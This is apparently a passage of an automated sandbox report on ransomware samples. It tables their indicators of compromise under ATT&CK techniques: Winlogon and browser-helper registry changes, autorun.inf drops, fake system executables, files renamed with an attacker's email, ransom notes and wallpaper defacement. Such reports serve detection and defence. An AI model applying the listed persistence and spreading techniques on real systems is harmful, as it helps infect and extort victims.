File opened (read-only)	\??\K:	Trojan-Ransom.Win32.GandCrypt.jdv-bfe57e23766e9709df6e275a6f4eb3dd841882c8b155398911491a99dde77732.exe
File opened (read-only)	\??\Q:	spools.exe
File opened (read-only)	\??\A:	rundll32.exe
File opened (read-only)	\??\W:	Trojan-Ransom.Win32.Sodin.aas-ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\M:	rundll32.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Installs/modifies Browser Helper Object 2 TTPs 3 IoCs

BHOs are DLL modules which act as plugins for Internet Explorer.

stealer adware

Modify Registry

T1112

Browser Extensions

T1176

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects	reg.exe

Modifies WinLogon 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\UIHost = "logonui.exe"	Trojan-Ransom.Win32.Blocker.itys-752faacdb6a477e6b45de1b6e1f2e756dd9a2f3d1a8d6294c11a1c46dd98f611.exe

Checks system information in the registry 2 TTPs 3 IoCs

System information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	browser.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	browser.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	browser.exe

Drops autorun.inf file 1 TTPs 4 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

description	ioc	Process
File opened for modification	F:\AUTORUN.INF	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-681b516d2b438bec4075d00701007c8cf49981d864bef9a0f81dadf3b78599bc.exe
File opened for modification	C:\AUTORUN.INF	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-681b516d2b438bec4075d00701007c8cf49981d864bef9a0f81dadf3b78599bc.exe
File opened for modification	C:\AUTORUN.INF	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	F:\AUTORUN.INF	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe

Drops file in System32 directory 11 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\notepad.exe.exe	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-681b516d2b438bec4075d00701007c8cf49981d864bef9a0f81dadf3b78599bc.exe
File opened for modification	C:\Windows\SysWOW64\inf\svchost.exe	Trojan-Ransom.Win32.Blocker.bzbf-a522c378bbfa4fb5d09bc79f41413ca297823f8253af592187104ca95e664090.exe
File created	C:\Windows\SysWOW64\inf\svchost.exe	Trojan-Ransom.Win32.Blocker.bzbf-a522c378bbfa4fb5d09bc79f41413ca297823f8253af592187104ca95e664090.exe
File opened for modification	C:\Windows\SysWOW64\inf\svchost.exe	svchost.exe
File created	C:\Windows\SysWOW64\Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Yandex\ui	service_update.exe
File created	C:\Windows\SysWOW64\HelpMe.exe	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-681b516d2b438bec4075d00701007c8cf49981d864bef9a0f81dadf3b78599bc.exe
File opened for modification	C:\Windows\SysWOW64\HelpMe.exe	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-681b516d2b438bec4075d00701007c8cf49981d864bef9a0f81dadf3b78599bc.exe
File created	C:\Windows\SysWOW64\inf\svchost.exe	svchost.exe
File created	C:\WINDOWS\SysWOW64\svch0st.exe	Trojan-Ransom.Win32.PornoAsset.dggw-f0c7d7525fdd13a49730e5cef8d6ea3d95361dbd439082c2c0701139460fa708.exe
File opened for modification	C:\WINDOWS\SysWOW64\svch0st.exe	Trojan-Ransom.Win32.PornoAsset.dggw-f0c7d7525fdd13a49730e5cef8d6ea3d95361dbd439082c2c0701139460fa708.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Decryption instructions.jpg"	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 8456 set thread context of 9244	8456	Trojan-Ransom.Win32.Blocker.gpjb-9aaa3d6cd47171f08169c6f96f721ae1820b655393f3410aa31891c133e0d015.exe	167
PID 8540 set thread context of 9540	8540	Trojan-Ransom.Win32.Gen.sgx-dafe53c9fb860e78aae45c8ab3dcc5da6c07ecbac0f62f5f02161a498ab759df.exe	252

UPX packed file 31 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2420-193-0x0000000000400000-0x0000000000608000-memory.dmp	upx
behavioral1/memory/2420-194-0x0000000000400000-0x0000000000608000-memory.dmp	upx
behavioral1/memory/2420-196-0x0000000000400000-0x0000000000608000-memory.dmp	upx
behavioral1/memory/2420-198-0x0000000000400000-0x0000000000608000-memory.dmp	upx
behavioral1/memory/2420-199-0x0000000000400000-0x0000000000608000-memory.dmp	upx
behavioral1/memory/2420-195-0x0000000000400000-0x0000000000608000-memory.dmp	upx
behavioral1/memory/2420-430-0x0000000000400000-0x0000000000608000-memory.dmp	upx
behavioral1/memory/2420-9326-0x0000000000400000-0x0000000000608000-memory.dmp	upx
behavioral1/files/0x0007000000023f60-9808.dat	upx
behavioral1/memory/9100-9812-0x0000000000400000-0x000000000040F000-memory.dmp	upx
behavioral1/memory/8412-9805-0x0000000000400000-0x000000000040F000-memory.dmp	upx
behavioral1/memory/2420-9803-0x0000000000400000-0x0000000000608000-memory.dmp	upx
behavioral1/memory/8412-10204-0x0000000000400000-0x000000000040F000-memory.dmp	upx
behavioral1/memory/2420-10981-0x0000000000400000-0x0000000000608000-memory.dmp	upx
behavioral1/memory/7920-11008-0x0000000000400000-0x000000000040F000-memory.dmp	upx
behavioral1/memory/5856-11178-0x0000000000400000-0x000000000040F000-memory.dmp	upx
behavioral1/memory/9352-11197-0x0000000000400000-0x000000000040F000-memory.dmp	upx
behavioral1/files/0x0009000000024267-11227.dat	upx
behavioral1/memory/7920-11236-0x0000000000400000-0x000000000040F000-memory.dmp	upx
behavioral1/memory/9568-11283-0x0000000000400000-0x0000000000487000-memory.dmp	upx
behavioral1/memory/8624-11289-0x0000000000400000-0x0000000000489000-memory.dmp	upx
behavioral1/files/0x00070000000242be-11296.dat	upx
behavioral1/memory/9568-11309-0x0000000000400000-0x0000000000487000-memory.dmp	upx
behavioral1/files/0x00080000000242be-11319.dat	upx
behavioral1/memory/8624-11329-0x0000000000400000-0x0000000000489000-memory.dmp	upx
behavioral1/memory/5712-12937-0x0000000000400000-0x0000000000489000-memory.dmp	upx
behavioral1/memory/7336-13700-0x0000000000400000-0x0000000000489000-memory.dmp	upx
behavioral1/memory/9108-14557-0x0000000000400000-0x000000000040F000-memory.dmp	upx
behavioral1/memory/7336-15955-0x0000000000400000-0x0000000000489000-memory.dmp	upx
behavioral1/memory/5712-21368-0x0000000000400000-0x0000000000489000-memory.dmp	upx
behavioral1/memory/5712-90616-0x0000000000400000-0x0000000000489000-memory.dmp	upx

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\sv-se\z8I9C_Entschluesselungs_Anleitung.html	Trojan-Ransom.Win32.Gen.sgx-dafe53c9fb860e78aae45c8ab3dcc5da6c07ecbac0f62f5f02161a498ab759df.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\z8I9C_Entschluesselungs_Anleitung.html	Trojan-Ransom.Win32.Gen.sgx-dafe53c9fb860e78aae45c8ab3dcc5da6c07ecbac0f62f5f02161a498ab759df.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\jvm.hprof.txt	wsmprovhost.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\jpeg.dll	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File created	C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-white_scale-180.png.id-77BB9BF9.johnycryptor@hackermail.com.xtbl	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\[email protected]	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\[email protected]	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\z8I9C_Entschluesselungs_Anleitung.html	Trojan-Ransom.Win32.Gen.sgx-dafe53c9fb860e78aae45c8ab3dcc5da6c07ecbac0f62f5f02161a498ab759df.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Formats.Asn1.dll	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\COMPASS\[email protected]	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2018.826.98.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraLargeTile.contrast-black_scale-125.png	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\clrcompression.dll	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\ended_review_or_form.gif.id-77BB9BF9.johnycryptor@hackermail.com.xtbl	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\[email protected]	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\misc\libfingerprinter_plugin.dll.id-77BB9BF9.johnycryptor@hackermail.com.xtbl	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Trust Protection Lists\Mu\Analytics	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.147.37\msedgeupdateres_kn.dll	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File created	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\hi-IN\View3d\z8I9C_Entschluesselungs_Anleitung.html	Trojan-Ransom.Win32.Gen.sgx-dafe53c9fb860e78aae45c8ab3dcc5da6c07ecbac0f62f5f02161a498ab759df.exe
File created	C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\z8I9C_Entschluesselungs_Anleitung.html	Trojan-Ransom.Win32.Gen.sgx-dafe53c9fb860e78aae45c8ab3dcc5da6c07ecbac0f62f5f02161a498ab759df.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\zh-Hans\PresentationCore.resources.dll	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File created	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\de\UIAutomationProvider.resources.dll.id-77BB9BF9.johnycryptor@hackermail.com.xtbl	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File created	C:\Program Files\Java\jdk-1.8\legal\javafx\[email protected]	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp2-ul-oob.xrm-ms.id-77BB9BF9.johnycryptor@hackermail.com.xtbl	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\[email protected]	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\remove.png	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\pl-pl\[email protected]	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-black\LargeTile.scale-200_contrast-black.png	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Program Files\Common Files\System\msadc\{RecOveR}-bthbh__.Png	wsmprovhost.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\Microsoft.Win32.Primitives.dll.id-77BB9BF9.johnycryptor@hackermail.com.xtbl	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\ja\WindowsBase.resources.dll	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\Library\{RecOveR}[email protected]	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PROOF\[email protected]	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.GetHelp_10.1706.13331.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\MediumTile.scale-100_contrast-black.png	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File created	C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInViews\z8I9C_Entschluesselungs_Anleitung.html	Trojan-Ransom.Win32.Gen.sgx-dafe53c9fb860e78aae45c8ab3dcc5da6c07ecbac0f62f5f02161a498ab759df.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\api-ms-win-core-file-l1-2-0.dll	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\ProjectProR_OEM_Perp-pl.xrm-ms.id-77BB9BF9.johnycryptor@hackermail.com.xtbl	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File created	C:\Program Files\Microsoft Office\root\Office16\MEDIA\{RecOveR}[email protected]	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\codec\libwebvtt_plugin.dll	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\[email protected]	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\StopwatchLargeTile.contrast-black_scale-200.png	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\mso30imm.dll	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Program Files\7-Zip\Lang\az.txt	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\CLVIEW.EXE	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\{RecOveR}[email protected]	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Program Files\Windows NT\Accessories\fr-FR\wordpad.exe.mui	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-white\LargeTile.scale-150_contrast-white.png	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\offsyml.ttf	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\FileExtension.targetsize-256.png	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\zh-tw\ui-strings.js	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\dummy\[email protected]	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\pt-PT\{RecOveR}[email protected]	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\VGX\{RecOveR}[email protected]	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\zh-Hant\UIAutomationClientSideProviders.resources.dll.id-77BB9BF9.johnycryptor@hackermail.com.xtbl	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\WordVL_MAK-pl.xrm-ms	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\{RecOveR}-bthbh__.Txt	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.scale-200_contrast-white.png	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Trust Protection Lists\Mu\[email protected]	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\de-DE\z8I9C_Entschluesselungs_Anleitung.html	Trojan-Ransom.Win32.Gen.sgx-dafe53c9fb860e78aae45c8ab3dcc5da6c07ecbac0f62f5f02161a498ab759df.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\[email protected]	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\share_icons.png	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\ar-SA\{RecOveR}[email protected]	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File created	C:\Program Files\Google\Chrome\Application\123.0.6312.123\Locales\[email protected]	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019R_OEM_Perp-ul-phn.xrm-ms.id-77BB9BF9.johnycryptor@hackermail.com.xtbl	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe

Drops file in Windows directory 25 IoCs

description	ioc	Process
File created	C:\Windows\INETINFO.exe	Trojan-Ransom.Win32.Blocker.bzbf-a522c378bbfa4fb5d09bc79f41413ca297823f8253af592187104ca95e664090.exe
File opened for modification	C:\WINDOWS\WindowsUpdate\	Trojan-Ransom.Win32.PornoAsset.dggw-f0c7d7525fdd13a49730e5cef8d6ea3d95361dbd439082c2c0701139460fa708.exe
File opened for modification	C:\Windows\Installer\e58c7cf.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID04F.tmp	msiexec.exe
File created	C:\Windows\Installer\SourceHash{5B964E0E-B9A3-4276-9ED9-4D5A5720747A}	msiexec.exe
File opened for modification	C:\Windows\INETINFO.exe	svchost.exe
File created	C:\Windows\Installer\e58c7cf.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSICF14.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID09E.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID10D.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID19A.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID312.tmp	msiexec.exe
File created	C:\Windows\Tasks\Update for Yandex Browser.job	service_update.exe
File opened for modification	C:\Windows\Installer\MSICFB1.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID02F.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID6CC.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID7B8.tmp	msiexec.exe
File opened for modification	C:\Windows\INETINFO.exe	Trojan-Ransom.Win32.Blocker.bzbf-a522c378bbfa4fb5d09bc79f41413ca297823f8253af592187104ca95e664090.exe
File created	C:\Windows\Tasks\System update for Yandex Browser.job	service_update.exe
File created	C:\Windows\Tasks\Repairing Yandex Browser update service.job	service_update.exe
File created	C:\Windows\Tasks\Обновление Браузера Яндекс.job	browser.exe
File opened for modification	C:\Windows\Installer\MSICE09.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 8 IoCs

pid	pid_target	Process	procid_target
1584	5052	WerFault.exe	112
4496	3388	WerFault.exe	123
9120	8388	WerFault.exe
6276	5948	WerFault.exe	187
8364	5960	WerFault.exe	188
10632	5932	WerFault.exe	185
6472	5928	WerFault.exe	186
4344	6016	WerFault.exe	191

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	service_update.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	spools.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	lakii.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	service_update.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wsmprovhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	{1F5F82BF-2B79-4090-98DD-024B258A832C}.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Gen.sgx-dafe53c9fb860e78aae45c8ab3dcc5da6c07ecbac0f62f5f02161a498ab759df.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.GandCrypt.gen-1a9f6f4967284cd122ee3447eac174f4513103b88b8364a698866eea4a7f773b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Blocker.iwia-f871ed8e69348e9deb8384dbd6cbc2591826f7a92b88014d2e399ecdb78f91fd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Foreign.oifc-e70d17459b65c266bd5c8eefc2e76b2c2709bf629e01e71c27d09382ac18dc3e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Encoder.gen-34b0dc15655965a488415da87322be5aa9625d6ade8374765b6a311fc989bbdf.exe
